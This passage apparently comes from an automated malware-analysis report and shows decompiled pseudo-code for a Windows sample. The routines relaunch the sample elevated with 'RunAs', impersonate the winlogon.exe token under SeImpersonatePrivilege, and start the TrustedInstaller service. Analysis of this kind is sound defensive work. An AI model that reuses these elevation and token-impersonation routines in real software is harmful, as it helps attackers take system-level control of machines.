                                                                                                                • Instruction Fuzzy Hash: 10413DB2900118EEDB10EFA0DCC5AEEB7B9EB44348F1041BAE609B3191D7359E85DF59
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 75%
                                                                                                                			E00401C26(long _a4) {
                                                                                                                				struct _SHELLEXECUTEINFOW _v68;
                                                                                                                				void _v582;
                                                                                                                				char _v584;
                                                                                                                				void _v1110;
                                                                                                                				char _v1112;
                                                                                                                				long _t23;
                                                                                                                				int _t36;
                                                                                                                				int _t41;
                                                                                                                				void* _t43;
                                                                                                                				long _t44;
                                                                                                                
                                                                                                                				_t44 = 0;
                                                                                                                				_t23 = GetCurrentProcessId();
                                                                                                                				_v584 = 0;
                                                                                                                				memset( &_v582, 0, 0x1fe);
                                                                                                                				_v1112 = 0;
                                                                                                                				memset( &_v1110, 0, 0x208);
                                                                                                                				E00404AD9( &_v1112);
                                                                                                                				_push(_t23);
                                                                                                                				_push(0);
                                                                                                                				_push(_a4);
                                                                                                                				_push(L"/SpecialRun %I64x %d");
                                                                                                                				_push(0xff);
                                                                                                                				_push( &_v584);
                                                                                                                				L0040B1EC();
                                                                                                                				memset( &(_v68.fMask), 0, 0x38);
                                                                                                                				_v68.lpFile =  &_v1112;
                                                                                                                				_v68.lpParameters =  &_v584;
                                                                                                                				_v68.cbSize = 0x3c;
                                                                                                                				_v68.lpVerb = L"RunAs";
                                                                                                                				_v68.fMask = 0x40;
                                                                                                                				_v68.nShow = 5;
                                                                                                                				_t36 = ShellExecuteExW( &_v68); // executed
                                                                                                                				_t43 = _v68.hProcess;
                                                                                                                				if(_t36 == 0) {
                                                                                                                					_t44 = GetLastError();
                                                                                                                				} else {
                                                                                                                					WaitForSingleObject(_t43, 0x5dc);
                                                                                                                					_a4 = 0;
                                                                                                                					_t41 = GetExitCodeProcess(_t43,  &_a4); // executed
                                                                                                                					if(_t41 != 0 && _a4 != 0x103) {
                                                                                                                						_t44 = _a4;
                                                                                                                					}
                                                                                                                				}
                                                                                                                				return _t44;
                                                                                                                			}














                                                                                                                APIs
                                                                                                                • GetCurrentProcessId.KERNEL32(004101D8,?), ref: 00401C33
                                                                                                                • memset.MSVCRT ref: 00401C4F
                                                                                                                • memset.MSVCRT ref: 00401C68
                                                                                                                  • Part of subcall function 00404AD9: GetModuleFileNameW.KERNEL32(00000000,e/@,00000104,00402F65,00000000,?,?,00000000), ref: 00404AE4
                                                                                                                • _snwprintf.MSVCRT ref: 00401C8F
                                                                                                                • memset.MSVCRT ref: 00401C9B
                                                                                                                • ShellExecuteExW.SHELL32(?), ref: 00401CD5
                                                                                                                • WaitForSingleObject.KERNEL32(?,000005DC), ref: 00401CE8
                                                                                                                • GetExitCodeProcess.KERNELBASE ref: 00401CF6
                                                                                                                • GetLastError.KERNEL32 ref: 00401D0E
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.302409416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.302399582.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 0000000D.00000002.302516782.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 0000000D.00000002.302548123.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 0000000D.00000002.303387158.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: memset$Process$CodeCurrentErrorExecuteExitFileLastModuleNameObjectShellSingleWait_snwprintf
                                                                                                                • String ID: /SpecialRun %I64x %d$<$@$RunAs
                                                                                                                • API String ID: 903100921-3385179869
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 100%
                                                                                                                			E00409921(struct HINSTANCE__** __esi) {
                                                                                                                				void* _t6;
                                                                                                                				struct HINSTANCE__* _t7;
                                                                                                                				_Unknown_base(*)()* _t12;
                                                                                                                				CHAR* _t13;
                                                                                                                				intOrPtr* _t17;
                                                                                                                
                                                                                                                				if( *__esi == 0) {
                                                                                                                					_t7 = E00405436(L"psapi.dll"); // executed
                                                                                                                					 *_t17 = "GetModuleBaseNameW";
                                                                                                                					 *__esi = _t7;
                                                                                                                					__esi[1] = GetProcAddress(_t7, _t13);
                                                                                                                					__esi[2] = GetProcAddress( *__esi, "EnumProcessModules");
                                                                                                                					__esi[4] = GetProcAddress( *__esi, "GetModuleFileNameExW");
                                                                                                                					__esi[5] = GetProcAddress( *__esi, "EnumProcesses");
                                                                                                                					_t12 = GetProcAddress( *__esi, "GetModuleInformation");
                                                                                                                					__esi[3] = _t12;
                                                                                                                					return _t12;
                                                                                                                				}
                                                                                                                				return _t6;
                                                                                                                			}









                                                                                                                APIs
                                                                                                                  • Part of subcall function 00405436: memset.MSVCRT ref: 00405456
                                                                                                                  • Part of subcall function 00405436: wcscat.MSVCRT ref: 00405478
                                                                                                                  • Part of subcall function 00405436: LoadLibraryW.KERNELBASE(00000000), ref: 00405489
                                                                                                                  • Part of subcall function 00405436: LoadLibraryW.KERNEL32(?), ref: 00405492
                                                                                                                • GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00409941
                                                                                                                • GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 0040994D
                                                                                                                • GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00409959
                                                                                                                • GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00409965
                                                                                                                • GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00409971
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.302409416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.302399582.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 0000000D.00000002.302516782.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 0000000D.00000002.302548123.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 0000000D.00000002.303387158.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: AddressProc$LibraryLoad$memsetwcscat
                                                                                                                • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                                                                                                • API String ID: 1529661771-70141382
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.302409416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.302399582.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 0000000D.00000002.302516782.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 0000000D.00000002.302548123.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 0000000D.00000002.303387158.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: HandleModule_initterm$InfoStartup__p__commode__p__fmode__set_app_type__setusermatherr__wgetmainargs_cexitexit
                                                                                                                • String ID:
                                                                                                                • API String ID: 2827331108-0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 90%
                                                                                                                			E00401F04(void* __edx, intOrPtr _a4) {
                                                                                                                				int _v8;
                                                                                                                				void _v538;
                                                                                                                				long _v540;
                                                                                                                				void _v1066;
                                                                                                                				char _v1068;
                                                                                                                				long _t30;
                                                                                                                				int _t33;
                                                                                                                				int _t39;
                                                                                                                				void* _t42;
                                                                                                                				void* _t45;
                                                                                                                				long _t49;
                                                                                                                
                                                                                                                				_t45 = __edx;
                                                                                                                				_v540 = 0;
                                                                                                                				memset( &_v538, 0, 0x208);
                                                                                                                				_v1068 = 0;
                                                                                                                				memset( &_v1066, 0, 0x208);
                                                                                                                				E00404C3C( &_v540);
                                                                                                                				_t48 = L"winlogon.exe";
                                                                                                                				_t39 = wcslen(L"winlogon.exe");
                                                                                                                				_t8 = wcslen( &_v540) + 1; // 0x1
                                                                                                                				_t53 = _t39 + _t8 - 0x104;
                                                                                                                				_pop(_t42);
                                                                                                                				if(_t39 + _t8 >= 0x104) {
                                                                                                                					_v1068 = 0;
                                                                                                                				} else {
                                                                                                                					E00404BE4( &_v1068,  &_v540, _t48);
                                                                                                                					_pop(_t42);
                                                                                                                				}
                                                                                                                				_v8 = 0;
                                                                                                                				_t30 = E00401DF9(_t45, _t53, _a4,  &_v1068,  &_v8); // executed
                                                                                                                				_t49 = _t30;
                                                                                                                				_t54 = _t49;
                                                                                                                				if(_t49 == 0) {
                                                                                                                					E00408F48(_t42, _t54, L"SeImpersonatePrivilege"); // executed
                                                                                                                					_t33 = ImpersonateLoggedOnUser(_v8); // executed
                                                                                                                					if(_t33 == 0) {
                                                                                                                						_t49 = GetLastError();
                                                                                                                					}
                                                                                                                					CloseHandle(_v8);
                                                                                                                				}
                                                                                                                				return _t49;
                                                                                                                			}















                                                                                                                APIs
                                                                                                                • memset.MSVCRT ref: 00401F27
                                                                                                                • memset.MSVCRT ref: 00401F3F
                                                                                                                  • Part of subcall function 00404C3C: GetSystemDirectoryW.KERNEL32(0041C6D0,00000104), ref: 00404C52
                                                                                                                  • Part of subcall function 00404C3C: wcscpy.MSVCRT ref: 00404C62
                                                                                                                • wcslen.MSVCRT ref: 00401F5A
                                                                                                                • wcslen.MSVCRT ref: 00401F69
                                                                                                                • ImpersonateLoggedOnUser.KERNELBASE(?,0040218D,?,?,?,?,?,?,?,00000000), ref: 00401FC2
                                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,00000000), ref: 00401FCC
                                                                                                                • CloseHandle.KERNEL32(?,?,?,?,?,?,00000000), ref: 00401FD7
                                                                                                                  • Part of subcall function 00404BE4: wcscpy.MSVCRT ref: 00404BEC
                                                                                                                  • Part of subcall function 00404BE4: wcscat.MSVCRT ref: 00404BFB
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.302409416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.302399582.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 0000000D.00000002.302516782.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 0000000D.00000002.302548123.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 0000000D.00000002.303387158.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: memsetwcscpywcslen$CloseDirectoryErrorHandleImpersonateLastLoggedSystemUserwcscat
                                                                                                                • String ID: SeImpersonatePrivilege$winlogon.exe
                                                                                                                • API String ID: 3867304300-2177360481
                                                                                                                • Opcode ID: b9815b26473cd7491ae288f5076cf4125b88922a7fa2441dfc3ee00491751d6f
                                                                                                                • Instruction ID: dcc5dec8953379ec1552ef046485534b93905478987a0ec3c51696e6dc85d708
                                                                                                                • Opcode Fuzzy Hash: b9815b26473cd7491ae288f5076cf4125b88922a7fa2441dfc3ee00491751d6f
                                                                                                                • Instruction Fuzzy Hash: 48214F72940118AACB20A795DC899DFB7BCDF54354F5001BBF608F2191EB345A848BAC
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 100%
                                                                                                                			E00401306(void* _a4) {
                                                                                                                				intOrPtr _v28;
                                                                                                                				struct _SERVICE_STATUS _v32;
                                                                                                                				void* _t5;
                                                                                                                				int _t12;
                                                                                                                				void* _t14;
                                                                                                                
                                                                                                                				_t12 = 0; // executed
                                                                                                                				_t5 = OpenServiceW(_a4, L"TrustedInstaller", 0x34); // executed
                                                                                                                				_t14 = _t5;
                                                                                                                				if(_t14 != 0) {
                                                                                                                					if(QueryServiceStatus(_t14,  &_v32) != 0 && _v28 != 4) {
                                                                                                                						_t12 = StartServiceW(_t14, 0, 0);
                                                                                                                					}
                                                                                                                					CloseServiceHandle(_t14);
                                                                                                                				}
                                                                                                                				CloseServiceHandle(_a4);
                                                                                                                				return _t12;
                                                                                                                			}









                                                                                                                APIs
                                                                                                                • OpenServiceW.ADVAPI32(00402183,TrustedInstaller,00000034,?,?,00000000,?,?,?,?,?,00402183,00000000), ref: 0040131B
                                                                                                                • QueryServiceStatus.ADVAPI32(00000000,?,?,?,?,?,?,00402183,00000000), ref: 00401332
                                                                                                                • StartServiceW.ADVAPI32(00000000,00000000,00000000), ref: 00401345
                                                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,00402183,00000000), ref: 0040134E
                                                                                                                • CloseServiceHandle.ADVAPI32(00402183,?,?,?,?,?,00402183,00000000), ref: 00401353
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.302409416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.302399582.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 0000000D.00000002.302516782.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 0000000D.00000002.302548123.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 0000000D.00000002.303387158.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: Service$CloseHandle$OpenQueryStartStatus
                                                                                                                • String ID: TrustedInstaller
                                                                                                                • API String ID: 862991418-565535830
                                                                                                                • Opcode ID: e275db5ffe703eced9a7585420ea8a7e70def606d9c8162886671e7be63d83f8
                                                                                                                • Instruction ID: 300c39592a487ff017dde1f9aaf4b69bffecac74e3568357a1b40912e0f2caec
                                                                                                                • Opcode Fuzzy Hash: e275db5ffe703eced9a7585420ea8a7e70def606d9c8162886671e7be63d83f8
                                                                                                                • Instruction Fuzzy Hash: F9F08275601218FBE7222BE59CC8DAF7A6CDF88794B040132FD01B12A0D674DD05C9F9
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 100%
                                                                                                                			E00409555(void* _a4, struct _FILETIME* _a8, struct _FILETIME* _a12, struct _FILETIME* _a16, struct _FILETIME* _a20) {
                                                                                                                				int _t8;
                                                                                                                				struct HINSTANCE__* _t9;
                                                                                                                
                                                                                                                				if( *0x41c8e8 == 0) {
                                                                                                                					_t9 = GetModuleHandleW(L"kernel32.dll");
                                                                                                                					if(_t9 != 0) {
                                                                                                                						 *0x41c8e8 = 1;
                                                                                                                						 *0x41c8ec = GetProcAddress(_t9, "GetProcessTimes");
                                                                                                                					}
                                                                                                                				}
                                                                                                                				if( *0x41c8ec == 0) {
                                                                                                                					return 0;
                                                                                                                				} else {
                                                                                                                					_t8 = GetProcessTimes(_a4, _a8, _a12, _a16, _a20); // executed
                                                                                                                					return _t8;
                                                                                                                				}
                                                                                                                			}






                                                                                                                APIs
                                                                                                                • GetModuleHandleW.KERNEL32(kernel32.dll,?,00409764,00000000,?,?,?,00401DD3,00000000,?), ref: 00409566
                                                                                                                • GetProcAddress.KERNEL32(00000000,GetProcessTimes), ref: 00409580
                                                                                                                • GetProcessTimes.KERNELBASE(00000000,00401DD3,?,?,?,?,00409764,00000000,?,?,?,00401DD3,00000000,?), ref: 004095A3
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.302409416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.302399582.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 0000000D.00000002.302516782.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 0000000D.00000002.302548123.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 0000000D.00000002.303387158.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: AddressHandleModuleProcProcessTimes
                                                                                                                • String ID: GetProcessTimes$kernel32.dll
                                                                                                                • API String ID: 1714573020-3385500049
                                                                                                                • Opcode ID: 7c908c3a013f4f9010f7eee84109228e73c5ea75ed64b39a480063120f72be39
                                                                                                                • Instruction ID: 684c615278f70e6dc9f1b796aa494e436c9634249af5aea594c4fe29f2bd0140
                                                                                                                • Opcode Fuzzy Hash: 7c908c3a013f4f9010f7eee84109228e73c5ea75ed64b39a480063120f72be39
                                                                                                                • Instruction Fuzzy Hash: 51F0C031680209EFDF019FE5ED85B9A3BE9EB44705F008535F908E12A1D7758960EB58
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 84%
                                                                                                                			E00402F31(void* _a4) {
                                                                                                                				void _v530;
                                                                                                                				long _v532;
                                                                                                                				void* __edi;
                                                                                                                				wchar_t* _t15;
                                                                                                                				intOrPtr _t18;
                                                                                                                				short* _t19;
                                                                                                                				void* _t22;
                                                                                                                				void* _t29;
                                                                                                                
                                                                                                                				_v532 = _v532 & 0x00000000;
                                                                                                                				memset( &_v530, 0, 0x208);
                                                                                                                				E00404AD9( &_v532);
                                                                                                                				_t15 = wcsrchr( &_v532, 0x2e);
                                                                                                                				if(_t15 != 0) {
                                                                                                                					 *_t15 =  *_t15 & 0x00000000;
                                                                                                                				}
                                                                                                                				wcscat( &_v532, L".cfg");
                                                                                                                				_t18 =  *0x40fa74; // 0x4101c8
                                                                                                                				_t19 = _t18 + 0x5504;
                                                                                                                				_t36 =  *_t19;
                                                                                                                				_pop(_t29);
                                                                                                                				if( *_t19 != 0) {
                                                                                                                					E00404923(0x104,  &_v532, _t19);
                                                                                                                					_pop(_t29);
                                                                                                                				}
                                                                                                                				_t22 = E00402FC6(_t29, _t36,  &_v532); // executed
                                                                                                                				return _t22;
                                                                                                                			}












                                                                                                                APIs
                                                                                                                • memset.MSVCRT ref: 00402F51
                                                                                                                  • Part of subcall function 00404AD9: GetModuleFileNameW.KERNEL32(00000000,e/@,00000104,00402F65,00000000,?,?,00000000), ref: 00404AE4
                                                                                                                • wcsrchr.MSVCRT ref: 00402F6F
                                                                                                                • wcscat.MSVCRT ref: 00402F8A
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.302409416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.302399582.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 0000000D.00000002.302516782.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 0000000D.00000002.302548123.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 0000000D.00000002.303387158.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: FileModuleNamememsetwcscatwcsrchr
                                                                                                                • String ID: .cfg
                                                                                                                • API String ID: 776488737-3410578098
                                                                                                                • Opcode ID: 728259185716957c59a96a9101d5f0e08b84084941d0fa3c3d1a3b0935b5c9f5
                                                                                                                • Instruction ID: 9e44addaa5645187fa8e636e844442f878cb26b9c6a589516f43c5b5973a5f2a
                                                                                                                • Opcode Fuzzy Hash: 728259185716957c59a96a9101d5f0e08b84084941d0fa3c3d1a3b0935b5c9f5
                                                                                                                • Instruction Fuzzy Hash: D501487254420C9ADB20E755DD8AFCA73BCEB54314F1008BBA514F61C1D7F8AAC48A9C
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 100%
                                                                                                                			E0040A33B(unsigned int _a4, WCHAR* _a8, WCHAR* _a12) {
                                                                                                                				struct HRSRC__* _t12;
                                                                                                                				void* _t16;
                                                                                                                				void* _t17;
                                                                                                                				signed int _t18;
                                                                                                                				signed int _t26;
                                                                                                                				signed int _t29;
                                                                                                                				signed int _t33;
                                                                                                                				struct HRSRC__* _t35;
                                                                                                                				signed int _t36;
                                                                                                                
                                                                                                                				_t12 = FindResourceW(_a4, _a12, _a8); // executed
                                                                                                                				_t35 = _t12;
                                                                                                                				if(_t35 != 0) {
                                                                                                                					_t33 = SizeofResource(_a4, _t35);
                                                                                                                					if(_t33 > 0) {
                                                                                                                						_t16 = LoadResource(_a4, _t35);
                                                                                                                						if(_t16 != 0) {
                                                                                                                							_t17 = LockResource(_t16);
                                                                                                                							if(_t17 != 0) {
                                                                                                                								_a4 = _t33;
                                                                                                                								_t29 = _t33 * _t33;
                                                                                                                								_t36 = 0;
                                                                                                                								_t7 =  &_a4;
                                                                                                                								 *_t7 = _a4 >> 2;
                                                                                                                								if( *_t7 != 0) {
                                                                                                                									do {
                                                                                                                										_t26 =  *(_t17 + _t36 * 4) * _t36 * _t33 * 0x00000011 ^  *(_t17 + _t36 * 4) + _t29;
                                                                                                                										_t36 = _t36 + 1;
                                                                                                                										_t29 = _t26;
                                                                                                                									} while (_t36 < _a4);
                                                                                                                								}
                                                                                                                								_t18 =  *0x40fa70; // 0xfcb617dc
                                                                                                                								 *0x40fa70 = _t18 + _t29 ^ _t33;
                                                                                                                							}
                                                                                                                						}
                                                                                                                					}
                                                                                                                				}
                                                                                                                				return 1;
                                                                                                                			}













                                                                                                                APIs
                                                                                                                • FindResourceW.KERNELBASE(?,?,?), ref: 0040A348
                                                                                                                • SizeofResource.KERNEL32(?,00000000), ref: 0040A359
                                                                                                                • LoadResource.KERNEL32(?,00000000), ref: 0040A369
                                                                                                                • LockResource.KERNEL32(00000000), ref: 0040A374
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.302409416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.302399582.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 0000000D.00000002.302516782.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 0000000D.00000002.302548123.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 0000000D.00000002.303387158.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: Resource$FindLoadLockSizeof
                                                                                                                • String ID:
                                                                                                                • API String ID: 3473537107-0
                                                                                                                • Opcode ID: 92957de205b1cf6ef3f394a564c4f395d7934c53f24f2b06f4a74fbc6cc11166
                                                                                                                • Instruction ID: cffa73b79ff672a66ed03b266e9253c2cf49bd0e4e2f0a3a12bdb4b298abf715
                                                                                                                • Opcode Fuzzy Hash: 92957de205b1cf6ef3f394a564c4f395d7934c53f24f2b06f4a74fbc6cc11166
                                                                                                                • Instruction Fuzzy Hash: 1101C032700315ABCB194FA5DD8995BBFAEFB852913088036ED09EA2A1D730C811CA88
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 35%
                                                                                                                			E00409DDC(intOrPtr* __ecx, void* __eflags, intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, intOrPtr _a16, WCHAR* _a20) {
                                                                                                                				char _v16390;
                                                                                                                				short _v16392;
                                                                                                                				void* __edi;
                                                                                                                				intOrPtr* _t30;
                                                                                                                				intOrPtr* _t34;
                                                                                                                				signed int _t36;
                                                                                                                				signed int _t37;
                                                                                                                
                                                                                                                				_t30 = __ecx;
                                                                                                                				E0040B550(0x4004, __ecx);
                                                                                                                				_push(0x4000);
                                                                                                                				_push(0);
                                                                                                                				_v16392 = 0;
                                                                                                                				_t34 = _t30;
                                                                                                                				_push( &_v16390);
                                                                                                                				if(_a4 == 0) {
                                                                                                                					memset();
                                                                                                                					GetPrivateProfileStringW(_a8, _a12, 0x40c4e8,  &_v16392, 0x2000, _a20); // executed
                                                                                                                					asm("sbb esi, esi");
                                                                                                                					_t37 =  ~_t36;
                                                                                                                					E004051B8( &_v16392, _t34, _a16);
                                                                                                                				} else {
                                                                                                                					memset();
                                                                                                                					E0040512F(_a16,  *_t34,  &_v16392);
                                                                                                                					_t37 = WritePrivateProfileStringW(_a8, _a12,  &_v16392, _a20);
                                                                                                                				}
                                                                                                                				return _t37;
                                                                                                                			}











                                                                                                                APIs
                                                                                                                • memset.MSVCRT ref: 00409E08
                                                                                                                  • Part of subcall function 0040512F: _snwprintf.MSVCRT ref: 00405174
                                                                                                                  • Part of subcall function 0040512F: memcpy.MSVCRT ref: 00405184
                                                                                                                • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 00409E31
                                                                                                                • memset.MSVCRT ref: 00409E3B
                                                                                                                • GetPrivateProfileStringW.KERNEL32 ref: 00409E5D
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.302409416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.302399582.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 0000000D.00000002.302516782.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 0000000D.00000002.302548123.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 0000000D.00000002.303387158.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: PrivateProfileStringmemset$Write_snwprintfmemcpy
                                                                                                                • String ID:
                                                                                                                • API String ID: 1127616056-0
                                                                                                                • Opcode ID: 58dd6d091b48cbb0307dc7b23365382c2a8386e907ab43d681c23093a5f2522d
                                                                                                                • Instruction ID: edc1d82326a177a4eed1c31c26edb3d60bf211bedf20f6070ddf32627235df0d
                                                                                                                • Opcode Fuzzy Hash: 58dd6d091b48cbb0307dc7b23365382c2a8386e907ab43d681c23093a5f2522d
                                                                                                                • Instruction Fuzzy Hash: A9117071500119AFDF11AF64DD06E9E7BA9EF04704F1000BAFB05B6191E7319E608BAD
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 100%
                                                                                                                			E00404951(signed int* __eax, void* __edx, void** __edi, signed int _a4, char _a8) {
                                                                                                                				void* _t8;
                                                                                                                				void* _t13;
                                                                                                                				signed int _t16;
                                                                                                                				void** _t21;
                                                                                                                				signed int _t22;
                                                                                                                
                                                                                                                				_t21 = __edi;
                                                                                                                				_t22 =  *__eax;
                                                                                                                				if(__edx < _t22) {
                                                                                                                					return 0;
                                                                                                                				} else {
                                                                                                                					_t13 =  *__edi;
                                                                                                                					do {
                                                                                                                						_t1 =  &_a8; // 0x4057e1
                                                                                                                						 *__eax =  *__eax +  *_t1;
                                                                                                                						_t16 =  *__eax;
                                                                                                                					} while (__edx >= _t16);
                                                                                                                					_t8 = malloc(_t16 * _a4); // executed
                                                                                                                					 *__edi = _t8;
                                                                                                                					if(_t22 > 0) {
                                                                                                                						if(_t8 != 0) {
                                                                                                                							memcpy(_t8, _t13, _t22 * _a4);
                                                                                                                						}
                                                                                                                						free(_t13); // executed
                                                                                                                					}
                                                                                                                					return 0 |  *_t21 != 0x00000000;
                                                                                                                				}
                                                                                                                			}









                                                                                                                APIs
                                                                                                                • malloc.MSVCRT ref: 0040496D
                                                                                                                • memcpy.MSVCRT ref: 00404985
                                                                                                                • free.MSVCRT(00000000,00000000,?,004055BF,00000002,?,00000000,?,004057E1,00000000,?,00000000), ref: 0040498E
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.302409416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.302399582.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 0000000D.00000002.302516782.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 0000000D.00000002.302548123.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 0000000D.00000002.303387158.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: freemallocmemcpy
                                                                                                                • String ID: W@
                                                                                                                • API String ID: 3056473165-1729568415
                                                                                                                • Opcode ID: 333fb239f4ff1cdabd0487bf4b3bf6bf98c6d246a46385af68035416a7f8f3c9
                                                                                                                • Instruction ID: 6576f77cd119d718dc8f29c334e0549a7190cc93a29033006f08a56aa9c3ab10
                                                                                                                • Opcode Fuzzy Hash: 333fb239f4ff1cdabd0487bf4b3bf6bf98c6d246a46385af68035416a7f8f3c9
                                                                                                                • Instruction Fuzzy Hash: 09F054B26092229FC708AA79B98585BB79DEF84364711487EF514E72D1D7389C40C7A8
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 100%
                                                                                                                			E00405436(wchar_t* _a4) {
                                                                                                                				void _v2050;
                                                                                                                				signed short _v2052;
                                                                                                                				void* __esi;
                                                                                                                				struct HINSTANCE__* _t16;
                                                                                                                				WCHAR* _t18;
                                                                                                                
                                                                                                                				_v2052 = _v2052 & 0x00000000;
                                                                                                                				memset( &_v2050, 0, 0x7fe);
                                                                                                                				E00404C3C( &_v2052);
                                                                                                                				_t18 =  &_v2052;
                                                                                                                				E004047AF(_t18);
                                                                                                                				wcscat(_t18, _a4);
                                                                                                                				_t16 = LoadLibraryW(_t18); // executed
                                                                                                                				if(_t16 == 0) {
                                                                                                                					return LoadLibraryW(_a4);
                                                                                                                				}
                                                                                                                				return _t16;
                                                                                                                			}








                                                                                                                APIs
                                                                                                                • memset.MSVCRT ref: 00405456
                                                                                                                  • Part of subcall function 00404C3C: GetSystemDirectoryW.KERNEL32(0041C6D0,00000104), ref: 00404C52
                                                                                                                  • Part of subcall function 00404C3C: wcscpy.MSVCRT ref: 00404C62
                                                                                                                  • Part of subcall function 004047AF: wcslen.MSVCRT ref: 004047B0
                                                                                                                  • Part of subcall function 004047AF: wcscat.MSVCRT ref: 004047C8
                                                                                                                • wcscat.MSVCRT ref: 00405478
                                                                                                                • LoadLibraryW.KERNELBASE(00000000), ref: 00405489
                                                                                                                • LoadLibraryW.KERNEL32(?), ref: 00405492
                                                                                                                Memory Dump Source
